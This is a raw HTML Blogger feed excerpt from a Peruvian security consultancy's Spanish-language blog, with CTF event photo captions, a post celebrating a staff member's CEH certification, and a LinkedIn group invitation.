{parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_5Ut8jEtbEaU/TKgYPh2wHUI/AAAAAAAAARQ/7esieSP8UbE/s1600/PICT0054.JPG"><img style="float: right; margin: 0pt 0pt 10px 10px; cursor: pointer; width: 200px; height: 150px;" src="http://1.bp.blogspot.com/_5Ut8jEtbEaU/TKgYPh2wHUI/AAAAAAAAARQ/7esieSP8UbE/s200/PICT0054.JPG" alt="" id="BLOGGER_PHOTO_ID_5523691598035033410" border="0" /></a><span style="font-family:trebuchet ms;">A la izquierda : MV en</span><span style="font-family:trebuchet ms;"> el CtF. Lo curioso fue que alguien di</span><span style="font-family:trebuchet ms;">jo : es un web! MV buscó, lo encontró y empezó a atacarlo. Rato después alguien le dice que era </span><span style="font-family:trebuchet ms;">un web que estaba publicado en Internet y los retos eran de esos que solo entienden los creadores y sus amigos. Curiosamente, el web del reto terminó siendo "alterado". Quién habrá sido ?</span><br /><span style="font-family:trebuchet ms;">A la d</span><span style="font-family:trebuchet ms;">erecha : MU, CC y JQ haciendo lockpicking que luego será aplicado en pruebas de seguridad física.</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_5Ut8jEtbEaU/TKgZd9MysdI/AAAAAAAAARY/qn-wHhyvtgE/s1600/PICT0082.JPG"><img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 200px; height: 150px;" src="http://4.bp.blogspot.com/_5Ut8jEtbEaU/TKgZd9MysdI/AAAAAAAAARY/qn-wHhyvtgE/s200/PICT0082.JPG" alt="" id="BLOGGER_PHOTO_ID_5523692945405030866" border="0" /></a><span style="font-family:trebuchet ms;">A la izquierda : seleccionando "exploits".</span><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_5Ut8jEtbEaU/TKgaSu7pH1I/AAAAAAAAARo/IxdzZZMCsPI/s1600/PICT0095.JPG"><img style="float: right; margin: 0pt 0pt 10px 10px; cursor: pointer; width: 200px; height: 150px;" src="http://2.bp.blogspot.com/_5Ut8jEtbEaU/TKgaSu7pH1I/AAAAAAAAARo/IxdzZZMCsPI/s200/PICT0095.JPG" alt="" id="BLOGGER_PHOTO_ID_5523693852108070738" border="0" /></a><br /><br /><span style="font-family:trebuchet ms;">A la derecha : MU meditando sobre el padding oracle attack...oooommmm...ZZZZZZ</span><br /><br /><br /><br /><br /><span style="font-family:trebuchet ms;">Dicen que la mejor defensa es el ataque, MV lo pone en práctica...</span><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_5Ut8jEtbEaU/TKgbqKSkC_I/AAAAAAAAAR4/ZHz2rkXtTTE/s1600/PICT0100.JPG"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 200px; height: 150px;" src="http://3.bp.blogspot.com/_5Ut8jEtbEaU/TKgbqKSkC_I/AAAAAAAAAR4/ZHz2rkXtTTE/s200/PICT0100.JPG" alt="" id="BLOGGER_PHOTO_ID_5523695354100583410" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_5Ut8jEtbEaU/TKgbMu00XvI/AAAAAAAAARw/K73itwQdY9Q/s1600/PICT0127.JPG"><img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 200px; height: 150px;" src="http://1.bp.blogspot.com/_5Ut8jEtbEaU/TKgbMu00XvI/AAAAAAAAARw/K73itwQdY9Q/s200/PICT0127.JPG" alt="" id="BLOGGER_PHOTO_ID_5523694848511860466" border="0" /></a> <span style="font-family:trebuchet ms;">A la izquiera : peruanos en el subte.</span><br /><br /></div><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_5Ut8jEtbEaU/TKgcHHokvwI/AAAAAAAAASA/_I9TQ0R-H14/s1600/IMAG0134.jpg"><img style="float: right; margin: 0pt 0pt 10px 10px; cursor: pointer; width: 200px; height: 119px;" src="http://3.bp.blogspot.com/_5Ut8jEtbEaU/TKgcHHokvwI/AAAAAAAAASA/_I9TQ0R-H14/s200/IMAG0134.jpg" alt="" id="BLOGGER_PHOTO_ID_5523695851603803906" border="0" /></a><br /><div style="text-align: justify;"><span style="font-family:trebuchet ms;"><span style="font-family:arial;">A la derecha : reciclador tecnológico.</span></span><br /><br /><br /><br /><br /><br /><br /></div>WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com2tag:blogger.com,1999:blog-8620588.post-58697321268567614622010-05-10T16:07:00.003-05:002010-05-11T22:23:30.580-05:00An score of 98% says that Mauricio Velazco is a Certified Ethical Hacker by EC Council...3 C|EH @ Open-SecPara nosotros es un tema bien importante el reconocimiento a quienes demuestran feacientemente su conocimiento y el hecho que Mauricio Velazco haya obtenido el dia de hoy la certificacion de C|EH es muy importante por varias razones :<br />1. Es el miembro mas joven de nuestro equipo y afaik, es el C|EH mas joven en Perú con 24 años.<br />2. Ya lleva cerca de 2 años haciendo unicamente ehtical hacking y computación forense y el puntaje obtenido en el examen demuestra que su experiencia ayudo mucho para el examen (no llevo un curso o similar).<br />3. Open-Sec resulta siendo la unica empresa local que cuenta con 3 C|EH en staff permanente.<br />4. Este es solamente el inicio de una saga de certificaciones que obtendra Mauricio, hoy conversabamos sobre la proxima, CPTE.<br /><br />FELICITACIONES MAURICIO!!!<br /><br /><p>UPDATE : El día de ayer también obtuvo su certificación como C|EH el consultor Rolando Antón. El no es parte del equipo de Open-Sec, es parte del equipo de Etel Perú, pero, es un gran Amigo nuestro y mio en particular.</p><p>Dado que hoy día Mauricio Velazco cumplió 25 años, desde hoy hasta octubre de este año, Rolando es el C|EH peruano más joven (AFAIK).</p>FELICITACIONES ROLANDO!!!!WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0tag:blogger.com,1999:blog-8620588.post-57267931629611949152010-04-09T09:34:00.001-05:002010-04-09T09:35:51.682-05:00Cuántos profesionales certificados en hacking son peruanos ?Invitación a registrarse :<br /><a href="http://www.linkedin.com/groups?home=&gid=2932414&trk=anet_ug_hm">http://www.linkedin.com/groups?home=&gid=2932414&trk=anet_ug_hm</a>WCuestashttp://www.blogger.com/profile/14254774436743443215noreply@blogger.com0